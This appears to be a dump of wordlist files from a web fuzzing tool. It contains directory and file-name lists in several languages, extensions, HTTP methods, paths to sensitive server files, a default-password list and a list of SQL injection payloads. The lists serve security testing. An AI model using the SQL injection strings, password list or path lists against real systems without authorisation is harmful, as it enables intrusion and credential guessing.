81 | localitzador 82 | locals 83 | maquinari 84 | mitjans 85 | mostra 86 | mostres 87 | mot 88 | noticies 89 | nou 90 | novetats 91 | nul 92 | obrir 93 | operacio 94 | organitzacions 95 | pagines 96 | pas 97 | personals 98 | pestanya 99 | pestanyes 100 | peu 101 | porta 102 | primer 103 | principal 104 | privat 105 | programari 106 | projecte 107 | projectes 108 | prova 109 | proves 110 | public 111 | publicacions 112 | pujar 113 | recerca 114 | 
recull 115 | reculls 116 | registre 117 | registres 118 | salo 119 | seccio 120 | segon 121 | seguretat 122 | serveis 123 | sistemes 124 | sumari 125 | sumaris 126 | tasques 127 | taula 128 | tauler 129 | tecnic 130 | temes 131 | tercer 132 | titulars 133 | tot 134 | totes 135 | tots 136 | transit 137 | transmissio 138 | treballador 139 | treballadors 140 | usuari 141 | usuaris 142 | vell 143 | veure 144 | -------------------------------------------------------------------------------- /wordlist/general/euskera.txt: -------------------------------------------------------------------------------- 1 | administrazio 2 | administrazioa 3 | argitalpenak 4 | artxiboa 5 | ataria 6 | aupa 7 | aurrera 8 | bai 9 | berri 10 | bidali 11 | bilatu 12 | buzoia 13 | dataz 14 | dokumentuak 15 | egutegia 16 | erreala 17 | ez 18 | fitxategia 19 | foru 20 | gestio 21 | gidak 22 | gora 23 | hasi 24 | hizkuntza 25 | ikusi 26 | informazio 27 | loturak 28 | makusi 29 | mezuak 30 | oharra 31 | proiektua 32 | saioa 33 | sustapena 34 | taula 35 | txostena 36 | -------------------------------------------------------------------------------- /wordlist/general/extensions_common.txt: -------------------------------------------------------------------------------- 1 | / 2 | .asp 3 | .aspx 4 | .bat 5 | .c 6 | .cfm 7 | .cgi 8 | .com 9 | .dll 10 | .exe 11 | .htm 12 | .html 13 | .inc 14 | .jhtml 15 | .jsa 16 | .jsp 17 | .log 18 | .mdb 19 | .nsf 20 | .php 21 | .phtml 22 | .pl 23 | .reg 24 | .sh 25 | .shtml 26 | .sql 27 | .txt 28 | .xml 29 | -------------------------------------------------------------------------------- /wordlist/general/http_methods.txt: -------------------------------------------------------------------------------- 1 | ACL 2 | CHECKIN 3 | CHECKOUT 4 | CONNECT 5 | COPY 6 | DELETE 7 | GET 8 | HEAD 9 | INDEX 10 | LINK 11 | LOCK 12 | MKCOL 13 | MOVE 14 | NOEXISTE 15 | OPTIONS 16 | ORDERPATCH 17 | PATCH 18 | POST 19 | PROPFIND 20 | PROPPATCH 21 | PUT 22 | REPORT 23 | SEARCH 24 | 
SHOWMETHOD 25 | SPACEJUMP 26 | TEXTSEARCH 27 | TRACE 28 | TRACK 29 | UNCHECKOUT 30 | UNLINK 31 | UNLOCK 32 | VERSION-CONTROL 33 | -------------------------------------------------------------------------------- /wordlist/general/medium.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/wordlist/general/medium.txt -------------------------------------------------------------------------------- /wordlist/general/mutations_common.txt: -------------------------------------------------------------------------------- 1 | ~ 2 | .001 3 | .002 4 | .1 5 | .2 6 | .7z 7 | .back 8 | .backup 9 | .bak 10 | .bakup 11 | .bas 12 | .bz2 13 | .c 14 | .conf 15 | .copia 16 | .core 17 | .cpp 18 | .dat 19 | .db 20 | .default 21 | .dll 22 | .doc 23 | .ini 24 | .jar 25 | .java 26 | .old 27 | .orig 28 | .pas 29 | .rar 30 | .sav 31 | .saved 32 | .source 33 | .src 34 | .stackdump 35 | .tar 36 | .tar.gz 37 | .temp 38 | .test 39 | .tgz 40 | .tmp 41 | .txt 42 | .war 43 | .Z 44 | .zip 45 | -------------------------------------------------------------------------------- /wordlist/general/spanish.txt: -------------------------------------------------------------------------------- 1 | abajo 2 | acceso 3 | acciones 4 | actividad 5 | actividades 6 | actual 7 | administracion 8 | adminsitradores 9 | agenda 10 | alias 11 | almacen 12 | antiguo 13 | aplicacion 14 | archivar 15 | archivo 16 | archivos 17 | area 18 | arriba 19 | articulo 20 | articulos 21 | auditoria 22 | ayuda 23 | banca 24 | banco 25 | base 26 | bbdd 27 | bdatos 28 | bolsa 29 | borrar 30 | boton 31 | botones 32 | buscador 33 | buscar 34 | buzon 35 | buzones 36 | cabecera 37 | caja 38 | cajon 39 | carga 40 | cargar 41 | carpeta 42 | carta 43 | cas 44 | cast 45 | castellano 46 | catalogo 47 | catalogos 48 | centro 49 | centros 50 | certificado 51 | certificados 52 | cifrado 53 | clave 54 | claves 55 | cliente 56 | 
clientes 57 | codigo 58 | coger 59 | coleccion 60 | colecciones 61 | comercio 62 | comercios 63 | componentes 64 | compra 65 | compras 66 | comun 67 | comunes 68 | comunicacion 69 | comunicaciones 70 | conecta 71 | configuracion 72 | contador 73 | contenedor 74 | contenido 75 | contenidos 76 | copia 77 | correo 78 | cs 79 | cuenta 80 | cuentas 81 | dato 82 | datos 83 | dejar 84 | demanda 85 | derecha 86 | desarrollo 87 | descarga 88 | descargas 89 | directorio 90 | diseno 91 | documentacion 92 | documento 93 | documentos 94 | ejemplo 95 | ejemplos 96 | empresa 97 | empresas 98 | enlace 99 | enlaces 100 | entidades 101 | entorno 102 | entornos 103 | entrada 104 | entregar 105 | entregas 106 | envia 107 | es 108 | escuela 109 | esp 110 | espanol 111 | estadisticas 112 | externos 113 | ficha 114 | fichas 115 | fichero 116 | ficheros 117 | forma 118 | formulario 119 | formularios 120 | foro 121 | foros 122 | forum 123 | foto 124 | fotos 125 | frontal 126 | general 127 | gestion 128 | guardar 129 | herramientas 130 | id 131 | imagen 132 | imagenes 133 | implantacion 134 | indice 135 | informacion 136 | ingresa 137 | ingreso 138 | inicio 139 | instalacion 140 | investigado 141 | invitado 142 | invitados 143 | izquierda 144 | juego 145 | juegos 146 | leer 147 | letras 148 | libros 149 | listar 150 | llamada 151 | llamadas 152 | llave 153 | llaves 154 | local 155 | localizador 156 | mapa 157 | medios 158 | menu 159 | mostrar 160 | movimientos 161 | muestra 162 | muestras 163 | nada 164 | noticia 165 | noticias 166 | nucleo 167 | nuevo 168 | nulo 169 | oculto 170 | oficina 171 | oficinas 172 | olvidado 173 | organizacion 174 | organizaciones 175 | pagina 176 | paginas 177 | palabra 178 | panel 179 | pantalla 180 | pantallas 181 | paso 182 | perfil 183 | perfiles 184 | personal 185 | personales 186 | pestana 187 | pizarra 188 | plano 189 | plantilla 190 | plantillas 191 | portada 192 | portal 193 | ppal 194 | primero 195 | principal 196 | principio 197 | privado 198 | 
probando 199 | procesos 200 | productos 201 | programa 202 | programador 203 | programas 204 | proveedores 205 | proyecto 206 | proyectos 207 | prueba 208 | pruebas 209 | publicacion 210 | publicaciones 211 | publico 212 | puerta 213 | raiz 214 | recoger 215 | registro 216 | registros 217 | remoto 218 | repaso 219 | respaldo 220 | revista 221 | rincon 222 | salon 223 | salvar 224 | seccion 225 | secreto 226 | segundo 227 | seguridad 228 | seleccion 229 | servicios 230 | servidor 231 | sistemas 232 | sitio 233 | subir 234 | sumario 235 | tabla 236 | tablas 237 | tecnico 238 | tecnicos 239 | temas 240 | temporal 241 | tercer 242 | texto 243 | tienda 244 | titular 245 | todas 246 | todo 247 | todos 248 | trabajador 249 | trabajadores 250 | traspaso 251 | usuario 252 | usuarios 253 | vacio 254 | validar 255 | ventana 256 | ver 257 | viejo 258 | -------------------------------------------------------------------------------- /wordlist/general/test.txt: -------------------------------------------------------------------------------- 1 | classes 2 | css 3 | docs 4 | environment 5 | images 6 | includes 7 | master 8 | prueba 9 | scripts 10 | test 11 | -------------------------------------------------------------------------------- /wordlist/others/common_pass.txt: -------------------------------------------------------------------------------- 1 | 2 | 123456 3 | 1234567 4 | 12345678 5 | 123asdf 6 | Admin 7 | admin 8 | administrator 9 | asdf123 10 | backup 11 | backupexec 12 | changeme 13 | clustadm 14 | cluster 15 | compaq 16 | default 17 | dell 18 | dmz 19 | domino 20 | exchadm 21 | exchange 22 | ftp 23 | gateway 24 | guest 25 | lotus 26 | money 27 | notes 28 | office 29 | oracle 30 | pass 31 | password 32 | password! 33 | password1 34 | print 35 | qwerty 36 | replicate 37 | seagate 38 | secret 39 | sql 40 | sqlexec 41 | temp 42 | temp! 43 | temp123 44 | test 45 | test! 
46 | test123 47 | tivoli 48 | veritas 49 | virus 50 | web 51 | www 52 | KKKKKKK -------------------------------------------------------------------------------- /wordlist/stress/alphanum_case.txt: -------------------------------------------------------------------------------- 1 | 0 2 | 1 3 | 2 4 | 3 5 | 4 6 | 5 7 | 6 8 | 7 9 | 8 10 | 9 11 | a 12 | b 13 | c 14 | d 15 | e 16 | f 17 | g 18 | h 19 | i 20 | j 21 | k 22 | l 23 | m 24 | n 25 | o 26 | p 27 | q 28 | r 29 | s 30 | t 31 | u 32 | v 33 | w 34 | x 35 | y 36 | z 37 | A 38 | B 39 | C 40 | D 41 | E 42 | F 43 | G 44 | H 45 | I 46 | J 47 | K 48 | L 49 | M 50 | N 51 | O 52 | P 53 | Q 54 | R 55 | S 56 | T 57 | U 58 | V 59 | W 60 | X 61 | Y 62 | Z 63 | -------------------------------------------------------------------------------- /wordlist/stress/alphanum_case_extra.txt: -------------------------------------------------------------------------------- 1 | ! 2 | " 3 | # 4 | $ 5 | % 6 | & 7 | ' 8 | ( 9 | ) 10 | * 11 | + 12 | , 13 | - 14 | . 15 | / 16 | 0 17 | 1 18 | 2 19 | 3 20 | 4 21 | 5 22 | 6 23 | 7 24 | 8 25 | 9 26 | : 27 | ; 28 | < 29 | = 30 | > 31 | ? 
32 | @ 33 | A 34 | B 35 | C 36 | D 37 | E 38 | F 39 | G 40 | H 41 | I 42 | J 43 | K 44 | L 45 | M 46 | N 47 | O 48 | P 49 | Q 50 | R 51 | S 52 | T 53 | U 54 | V 55 | W 56 | X 57 | Y 58 | Z 59 | [ 60 | \ 61 | ] 62 | ^ 63 | _ 64 | ` 65 | a 66 | b 67 | c 68 | d 69 | e 70 | f 71 | g 72 | h 73 | i 74 | j 75 | k 76 | l 77 | m 78 | n 79 | o 80 | p 81 | q 82 | r 83 | s 84 | t 85 | u 86 | v 87 | w 88 | x 89 | y 90 | z 91 | { 92 | | 93 | } 94 | ~ 95 | 96 | -------------------------------------------------------------------------------- /wordlist/stress/char.txt: -------------------------------------------------------------------------------- 1 | a 2 | b 3 | c 4 | d 5 | e 6 | f 7 | g 8 | h 9 | i 10 | j 11 | k 12 | l 13 | m 14 | n 15 | o 16 | p 17 | q 18 | r 19 | s 20 | t 21 | u 22 | v 23 | w 24 | x 25 | y 26 | z 27 | -------------------------------------------------------------------------------- /wordlist/stress/doble_uri_hex.txt: -------------------------------------------------------------------------------- 1 | %2500 2 | %2501 3 | %2502 4 | %2503 5 | %2504 6 | %2505 7 | %2506 8 | %2507 9 | %2508 10 | %2509 11 | %250a 12 | %250b 13 | %250c 14 | %250d 15 | %250e 16 | %250f 17 | %2510 18 | %2511 19 | %2512 20 | %2513 21 | %2514 22 | %2515 23 | %2516 24 | %2517 25 | %2518 26 | %2519 27 | %251a 28 | %251b 29 | %251c 30 | %251d 31 | %251e 32 | %251f 33 | %2520 34 | %2521 35 | %2522 36 | %2523 37 | %2524 38 | %2525 39 | %2526 40 | %2527 41 | %2528 42 | %2529 43 | %252a 44 | %252b 45 | %252c 46 | %252d 47 | %252e 48 | %252f 49 | %2530 50 | %2531 51 | %2532 52 | %2533 53 | %2534 54 | %2535 55 | %2536 56 | %2537 57 | %2538 58 | %2539 59 | %253a 60 | %253b 61 | %253c 62 | %253d 63 | %253e 64 | %253f 65 | %2540 66 | %2541 67 | %2542 68 | %2543 69 | %2544 70 | %2545 71 | %2546 72 | %2547 73 | %2548 74 | %2549 75 | %254a 76 | %254b 77 | %254c 78 | %254d 79 | %254e 80 | %254f 81 | %2550 82 | %2551 83 | %2552 84 | %2553 85 | %2554 86 | %2555 87 | %2556 88 | %2557 89 | %2558 90 | %2559 91 
| %255a 92 | %255b 93 | %255c 94 | %255d 95 | %255e 96 | %255f 97 | %2560 98 | %2561 99 | %2562 100 | %2563 101 | %2564 102 | %2565 103 | %2566 104 | %2567 105 | %2568 106 | %2569 107 | %256a 108 | %256b 109 | %256c 110 | %256d 111 | %256e 112 | %256f 113 | %2570 114 | %2571 115 | %2572 116 | %2573 117 | %2574 118 | %2575 119 | %2576 120 | %2577 121 | %2578 122 | %2579 123 | %257a 124 | %257b 125 | %257c 126 | %257d 127 | %257e 128 | %257f 129 | %2580 130 | %2581 131 | %2582 132 | %2583 133 | %2584 134 | %2585 135 | %2586 136 | %2587 137 | %2588 138 | %2589 139 | %258a 140 | %258b 141 | %258c 142 | %258d 143 | %258e 144 | %258f 145 | %2590 146 | %2591 147 | %2592 148 | %2593 149 | %2594 150 | %2595 151 | %2596 152 | %2597 153 | %2598 154 | %2599 155 | %259a 156 | %259b 157 | %259c 158 | %259d 159 | %259e 160 | %259f 161 | %25a0 162 | %25a1 163 | %25a2 164 | %25a3 165 | %25a4 166 | %25a5 167 | %25a6 168 | %25a7 169 | %25a8 170 | %25a9 171 | %25aa 172 | %25ab 173 | %25ac 174 | %25ad 175 | %25ae 176 | %25af 177 | %25b0 178 | %25b1 179 | %25b2 180 | %25b3 181 | %25b4 182 | %25b5 183 | %25b6 184 | %25b7 185 | %25b8 186 | %25b9 187 | %25ba 188 | %25bb 189 | %25bc 190 | %25bd 191 | %25be 192 | %25bf 193 | %25c0 194 | %25c1 195 | %25c2 196 | %25c3 197 | %25c4 198 | %25c5 199 | %25c6 200 | %25c7 201 | %25c8 202 | %25c9 203 | %25ca 204 | %25cb 205 | %25cc 206 | %25cd 207 | %25ce 208 | %25cf 209 | %25d0 210 | %25d1 211 | %25d2 212 | %25d3 213 | %25d4 214 | %25d5 215 | %25d6 216 | %25d7 217 | %25d8 218 | %25d9 219 | %25da 220 | %25db 221 | %25dc 222 | %25dd 223 | %25de 224 | %25df 225 | %25e0 226 | %25e1 227 | %25e2 228 | %25e3 229 | %25e4 230 | %25e5 231 | %25e6 232 | %25e7 233 | %25e8 234 | %25e9 235 | %25ea 236 | %25eb 237 | %25ec 238 | %25ed 239 | %25ee 240 | %25ef 241 | %25f0 242 | %25f1 243 | %25f2 244 | %25f3 245 | %25f4 246 | %25f5 247 | %25f6 248 | %25f7 249 | %25f8 250 | %25f9 251 | %25fa 252 | %25fb 253 | %25fc 254 | %25fd 255 | %25fe 256 | %25ff 257 | 
-------------------------------------------------------------------------------- /wordlist/stress/uri_hex.txt: -------------------------------------------------------------------------------- 1 | %00 2 | %01 3 | %02 4 | %03 5 | %04 6 | %05 7 | %06 8 | %07 9 | %08 10 | %09 11 | %0a 12 | %0b 13 | %0c 14 | %0d 15 | %0e 16 | %0f 17 | %10 18 | %11 19 | %12 20 | %13 21 | %14 22 | %15 23 | %16 24 | %17 25 | %18 26 | %19 27 | %1a 28 | %1b 29 | %1c 30 | %1d 31 | %1e 32 | %1f 33 | %20 34 | %21 35 | %22 36 | %23 37 | %24 38 | %25 39 | %26 40 | %27 41 | %28 42 | %29 43 | %2a 44 | %2b 45 | %2c 46 | %2d 47 | %2e 48 | %2f 49 | %30 50 | %31 51 | %32 52 | %33 53 | %34 54 | %35 55 | %36 56 | %37 57 | %38 58 | %39 59 | %3a 60 | %3b 61 | %3c 62 | %3d 63 | %3e 64 | %3f 65 | %40 66 | %41 67 | %42 68 | %43 69 | %44 70 | %45 71 | %46 72 | %47 73 | %48 74 | %49 75 | %4a 76 | %4b 77 | %4c 78 | %4d 79 | %4e 80 | %4f 81 | %50 82 | %51 83 | %52 84 | %53 85 | %54 86 | %55 87 | %56 88 | %57 89 | %58 90 | %59 91 | %5a 92 | %5b 93 | %5c 94 | %5d 95 | %5e 96 | %5f 97 | %60 98 | %61 99 | %62 100 | %63 101 | %64 102 | %65 103 | %66 104 | %67 105 | %68 106 | %69 107 | %6a 108 | %6b 109 | %6c 110 | %6d 111 | %6e 112 | %6f 113 | %70 114 | %71 115 | %72 116 | %73 117 | %74 118 | %75 119 | %76 120 | %77 121 | %78 122 | %79 123 | %7a 124 | %7b 125 | %7c 126 | %7d 127 | %7e 128 | %7f 129 | %80 130 | %81 131 | %82 132 | %83 133 | %84 134 | %85 135 | %86 136 | %87 137 | %88 138 | %89 139 | %8a 140 | %8b 141 | %8c 142 | %8d 143 | %8e 144 | %8f 145 | %90 146 | %91 147 | %92 148 | %93 149 | %94 150 | %95 151 | %96 152 | %97 153 | %98 154 | %99 155 | %9a 156 | %9b 157 | %9c 158 | %9d 159 | %9e 160 | %9f 161 | %a0 162 | %a1 163 | %a2 164 | %a3 165 | %a4 166 | %a5 167 | %a6 168 | %a7 169 | %a8 170 | %a9 171 | %aa 172 | %ab 173 | %ac 174 | %ad 175 | %ae 176 | %af 177 | %b0 178 | %b1 179 | %b2 180 | %b3 181 | %b4 182 | %b5 183 | %b6 184 | %b7 185 | %b8 186 | %b9 187 | %ba 188 | %bb 189 | %bc 190 | %bd 191 | %be 192 | 
%bf 193 | %c0 194 | %c1 195 | %c2 196 | %c3 197 | %c4 198 | %c5 199 | %c6 200 | %c7 201 | %c8 202 | %c9 203 | %ca 204 | %cb 205 | %cc 206 | %cd 207 | %ce 208 | %cf 209 | %d0 210 | %d1 211 | %d2 212 | %d3 213 | %d4 214 | %d5 215 | %d6 216 | %d7 217 | %d8 218 | %d9 219 | %da 220 | %db 221 | %dc 222 | %dd 223 | %de 224 | %df 225 | %e0 226 | %e1 227 | %e2 228 | %e3 229 | %e4 230 | %e5 231 | %e6 232 | %e7 233 | %e8 234 | %e9 235 | %ea 236 | %eb 237 | %ec 238 | %ed 239 | %ee 240 | %ef 241 | %f0 242 | %f1 243 | %f2 244 | %f3 245 | %f4 246 | %f5 247 | %f6 248 | %f7 249 | %f8 250 | %f9 251 | %fa 252 | %fb 253 | %fc 254 | %fd 255 | %fe 256 | %ff 257 | -------------------------------------------------------------------------------- /wordlist/vulns/apache.txt: -------------------------------------------------------------------------------- 1 | .htaccess 2 | .htpasswd 3 | .meta 4 | .web 5 | access_log 6 | cgi 7 | cgi-bin 8 | cgi-pub 9 | cgi-script 10 | dummy 11 | error 12 | error_log 13 | htdocs 14 | httpd 15 | httpd.pid 16 | icons 17 | index.html 18 | logs 19 | manual 20 | phf 21 | printenv 22 | server-info 23 | server-status 24 | status 25 | test-cgi 26 | tmp 27 | ~bin 28 | ~ftp 29 | ~nobody 30 | ~root 31 | -------------------------------------------------------------------------------- /wordlist/vulns/coldfusion.txt: -------------------------------------------------------------------------------- 1 | CFIDE 2 | CFIDE/administrator 3 | CFIDE/administrator/aboutcf.cfm 4 | CFIDE/administrator/Application.cfm 5 | CFIDE/administrator/checkfile.cfm 6 | CFIDE/administrator/enter.cfm 7 | CFIDE/administrator/header.cfm 8 | CFIDE/administrator/homefile.cfm 9 | CFIDE/administrator/homepage.cfm 10 | CFIDE/administrator/index.cfm 11 | CFIDE/administrator/left.cfm 12 | CFIDE/administrator/linkdirect.cfm 13 | CFIDE/administrator/login.cfm 14 | CFIDE/administrator/logout.cfm 15 | CFIDE/administrator/navserver.cfm 16 | CFIDE/administrator/right.cfm 17 | CFIDE/administrator/tabs.cfm 18 | 
CFIDE/administrator/welcome.cfm 19 | CFIDE/administrator/welcomedoc.cfm 20 | CFIDE/administrator/welcomeexapps.cfm 21 | CFIDE/administrator/welcomefooter.cfm 22 | CFIDE/administrator/welcomegetstart.cfm -------------------------------------------------------------------------------- /wordlist/vulns/fatwire.txt: -------------------------------------------------------------------------------- 1 | servlet/HelloCS 2 | servlet/ContentServer 3 | servlet/Satellite 4 | servlet/CatalogManager 5 | servlet/BlobServer 6 | servlet/TreeManager 7 | servlet/CookieServer 8 | servlet/CacheServer 9 | servlet/EvalServer 10 | servlet/DebugServer 11 | servlet/FlushServer 12 | servlet/SeedDispatchServer 13 | servlet/Inventory 14 | servlet/SyncSeedDispatchServer 15 | servlet/PageDispatchServer 16 | servlet/DispatchManager 17 | servlet 18 | HelloCS 19 | ContentServer 20 | Satellite 21 | CatalogManager 22 | BlobServer 23 | TreeManager 24 | CookieServer 25 | CacheServer 26 | EvalServer 27 | DebugServer 28 | FlushServer 29 | SeedDispatchServer 30 | Inventory 31 | SyncSeedDispatchServer 32 | PageDispatchServer 33 | DispatchManager 34 | Xcelerate/Admin/LoginPage.html 35 | Xcelerate 36 | Admin 37 | LoginPage 38 | LoginPage.html 39 | Xcelerate/LoginPage.html 40 | futuretense_cs/adminforms.html 41 | futuretense_cs 42 | adminforms 43 | adminforms.html 44 | futuretense 45 | openmarket 46 | fatwire 47 | divine 48 | contentserver 49 | xcelerate 50 | assetmaker 51 | -------------------------------------------------------------------------------- /wordlist/vulns/frontpage.txt: -------------------------------------------------------------------------------- 1 | .htaccess 2 | QUERYHIT.HTM 3 | Search 4 | _fpclass 5 | _private 6 | _vti_adm 7 | _vti_aut 8 | _vti_bin 9 | _vti_cnf 10 | _vti_inf.html 11 | _vti_log 12 | _vti_pvt 13 | _vti_script 14 | _vti_txt 15 | admin.dll 16 | admin.exe 17 | administrators.pwd 18 | author.dll 19 | author.exe 20 | author.log 21 | authors.pwd 22 | cgi-bin 23 | default.htm 24 | 
frontpg.ini 25 | iisadmin 26 | isadmin 27 | logo.gif 28 | owssvr.dll 29 | queryhit.htm 30 | samples 31 | search 32 | service.grp 33 | service.pwd 34 | shtml.exe 35 | srchadm 36 | users.pwd 37 | vti_inf.html 38 | -------------------------------------------------------------------------------- /wordlist/vulns/iis.txt: -------------------------------------------------------------------------------- 1 | Micros~1 2 | WebSer~1 3 | _mem_bin 4 | _private 5 | _vti_adm 6 | _vti_aut 7 | _vti_bin 8 | _vti_cnf 9 | _vti_log 10 | _vti_pvt 11 | _vti_script 12 | _vti_txt 13 | administration 14 | adsamples 15 | archiv~1 16 | asp 17 | aspnet_client 18 | asps 19 | bin 20 | bins 21 | cgi-bin 22 | cmsample 23 | common 24 | common~1 25 | db 26 | fpsample 27 | help 28 | iisadmin 29 | iisadmpwd 30 | iishelp 31 | iissamples 32 | images 33 | inetpub 34 | inetsrv 35 | isapi 36 | msadc 37 | pbserver 38 | printers 39 | progra~1 40 | samples 41 | scripts 42 | scripts 43 | scripts/samples 44 | scripts/tools 45 | sites 46 | siteserver 47 | system 48 | system_web 49 | web 50 | webpub 51 | winnt 52 | wwwroot 53 | x.cfm 54 | x.htx 55 | x.ida 56 | x.idc 57 | x.idq 58 | x.pl 59 | x.shtml 60 | -------------------------------------------------------------------------------- /wordlist/vulns/iplanet.txt: -------------------------------------------------------------------------------- 1 | ?Publisher 2 | ?wp-cs-dump 3 | ?wp-html-rend 4 | ?wp-start-ver 5 | ?wp-stop-ver 6 | ?wp-uncheckout 7 | ?wp-usr-prop 8 | ?wp-ver-diff 9 | ?wp-ver-info 10 | ?wp-verify-link 11 | admin-serv 12 | admin-serv/config/admpw 13 | admpw 14 | agents 15 | bin 16 | ca 17 | ca 18 | cgi-bin 19 | config 20 | dirb_random.cgi 21 | dirb_random.jsp 22 | dirb_random.shtml 23 | docs 24 | dsgw 25 | help 26 | index.html 27 | jsp 28 | manual 29 | mc-icons 30 | netshare 31 | ns-icons 32 | publisher 33 | search 34 | search-ui 35 | servlet 36 | servlets 37 | -------------------------------------------------------------------------------- 
/wordlist/vulns/jrun.txt: -------------------------------------------------------------------------------- 1 | SmarTicketApp/index.html 2 | WEB-INF/webapp.properties 3 | WEB-INF/web.xml 4 | compass/logon.jsp 5 | databasenotes.html 6 | flash/java/javabean/FlashJavaBean.html 7 | jrunscripts 8 | jstl-war/index.html 9 | techniques/servlets/index.html 10 | travelnet/home.jsp 11 | worldmusic/action/cdlist 12 | worldmusic/action/catalog 13 | ws-client/loanCalculation.jsp 14 | -------------------------------------------------------------------------------- /wordlist/vulns/netware.txt: -------------------------------------------------------------------------------- 1 | ICHAINErrors 2 | ICSLogin 3 | ICHAINLogout 4 | ICSIBroker 5 | NetStorage 6 | iManager 7 | eMFrame 8 | oneNet 9 | ICHAIN 10 | ICS 11 | NSearch 12 | SearchServlet 13 | site 14 | home.html 15 | iFolder 16 | update 17 | webacc 18 | nps 19 | -------------------------------------------------------------------------------- /wordlist/vulns/oracle9i.txt: -------------------------------------------------------------------------------- 1 | CookieExample 2 | Counter 3 | DateServlet 4 | HelloWorldServlet 5 | RequestParamExample 6 | SessionExample 7 | SessionServlet 8 | SimpleServlet 9 | SnoopServlet 10 | basic 11 | cal 12 | cgi-bin 13 | echo 14 | examples 15 | fcgi-bin 16 | hellouser 17 | hellouser.jsp 18 | j2ee 19 | jsp 20 | login.html 21 | ojspdemos 22 | perl 23 | printenv 24 | servlet 25 | simple 26 | snoop.jsp 27 | snp 28 | usebean.jsp 29 | welcomeuser.jsp 30 | -------------------------------------------------------------------------------- /wordlist/vulns/sql_inj.txt: -------------------------------------------------------------------------------- 1 | ' 2 | --ora_sqls 3 | #mysql 4 | '#mysql 5 | and 1=1 6 | and USER=USER 7 | and user()=user() 8 | and 2=0 9 | or 2=2 10 | ' and '2'='2 11 | ' and '2'='0 12 | ' or '2'='2 13 | /*ora_mysql*/and/**/2=2 14 | /*ora_mysql*/and/**/2=0 15 | '/*ora_mysql*/and/**/'2'='2 16 | 
'/*ora_mysql*/and/**/'2'='0 17 | '/*ora_mysql*/or/**/'2'='2 18 | and 2=2#mysql 19 | and 2=0#mysql 20 | and 2=2-- oracle_mysql 21 | and 2=0-- oracle_mysql 22 | ' and '2'='2'#mysql 23 | ' and '2'='0'#mysql 24 | ' and '2'='2'-- oracle 25 | ' and '2'='0'-- oracle 26 | 999999999999999999 27 | 1e100 28 | 2 or 2=2 29 | 2' or '2'='2 30 | order by 1-- 31 | admin'-- 32 | admin' 33 | 'test 34 | 'test-- 35 | ' or 1=1-- 36 | or 1=1-- 37 | or 1=1 38 | or 1=1# 39 | " or 1=1# 40 | admin'# 41 | now() 42 | 43 | -------------------------------------------------------------------------------- /wordlist/vulns/sunas.txt: -------------------------------------------------------------------------------- 1 | ias-samples 2 | ias-samples/index.html 3 | index.html 4 | cgi-bin 5 | cgi-bin/gx.cgi 6 | cgi-bin/gx.dll 7 | cgi-bin/gx.exe 8 | gx 9 | gx.cgi 10 | gx.exe 11 | GXApp 12 | GXApp/index.html 13 | GXApp/COnlineBank 14 | GXApp/COnlineBank/COBLogin.html 15 | GXApp/CSample 16 | GXApp/CSample/index.html 17 | GXApp/images 18 | GXApp/OnlineBank 19 | GXApp/OnlineBank/OBLogin.html 20 | fortune 21 | NASApp/fortune/fortune 22 | lotery 23 | COnlineBank 24 | CSample 25 | OnlineBank 26 | NASApp 27 | NASApp/system 28 | NASApp/system/ValidationError.jsp 29 | NASApp/system/ExceptionThrown.jsp 30 | NASApp/system/JSPRunner 31 | NASApp/system/JSPRunnerSticky 32 | NASApp/system/SessionInvalidator 33 | NASApp/system/StaticServlet 34 | NASApp/system/WelcomeListServlet 35 | NASApp/system/FormAuthServlet 36 | NASApp/system/CertAuthServlet 37 | NASApp/system/BasicAuthServlet 38 | system 39 | ValidationError.jsp 40 | ExceptionThrown.jsp 41 | JSPRunner 42 | JSPRunnerSticky 43 | SessionInvalidator 44 | StaticServlet 45 | WelcomeListServlet 46 | FormAuthServlet 47 | CertAuthServlet 48 | BasicAuthServlet 49 | com.netscape.server.servlet.jsp.JSPRunner 50 | servlet 51 | classes 52 | 53 | -------------------------------------------------------------------------------- /wordlist/vulns/tests.txt: 
-------------------------------------------------------------------------------- 1 | test 2 | test1 3 | test2 4 | test00 5 | test01 6 | tests 7 | testing 8 | tst 9 | tsts 10 | probando 11 | prueba 12 | prueba1 13 | prueba2 14 | prueba00 15 | prueba01 16 | pruebas 17 | prova 18 | prova1 19 | prova2 20 | provas 21 | TEST 22 | TESTS 23 | Test 24 | Tests 25 | tester 26 | Pruebas 27 | PRUEBA 28 | PRUEBAS 29 | Prova 30 | Provas 31 | demo 32 | DEMO 33 | Demo 34 | 35 | -------------------------------------------------------------------------------- /wordlist/vulns/tomcat.txt: -------------------------------------------------------------------------------- 1 | examples 2 | examples/jsp/index.html 3 | examples/servlets/index.html 4 | examples/servlet/HelloWorldExample 5 | examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample 6 | examples/servlet/snoop 7 | examples/servlet/SnoopServlet 8 | examples/servlet/org.apache.catalina.INVOKER.SnoopServlet 9 | examples/servlet/TroubleShooter 10 | examples/servlet/org.apache.catalina.INVOKER.TroubleShooter 11 | examples/jsp/snp/snoop.jsp 12 | examples/jsp/source.jsp 13 | servlet/default/ 14 | servlet/org.apache.catalina.servlets.DefaultServlet/ 15 | examples/servlet/default/jsp/snp/snoop.jsp 16 | examples/servlet/default/jsp/source.jsp 17 | examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp 18 | examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp 19 | manager 20 | tomcat-docs 21 | webdav 22 | webdav/index.html 23 | webdav/servlet/webdav/ 24 | webdav/servlet/org.apache.catalina.servlets.WebdavServlet/ 25 | servlet/org.apache.catalina.servlets.WebdavServlet/ 26 | servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/ 27 | examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp 28 | examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp 29 | servlet/org.apache.catalina.servlets.SnoopAllServlet 30 | 
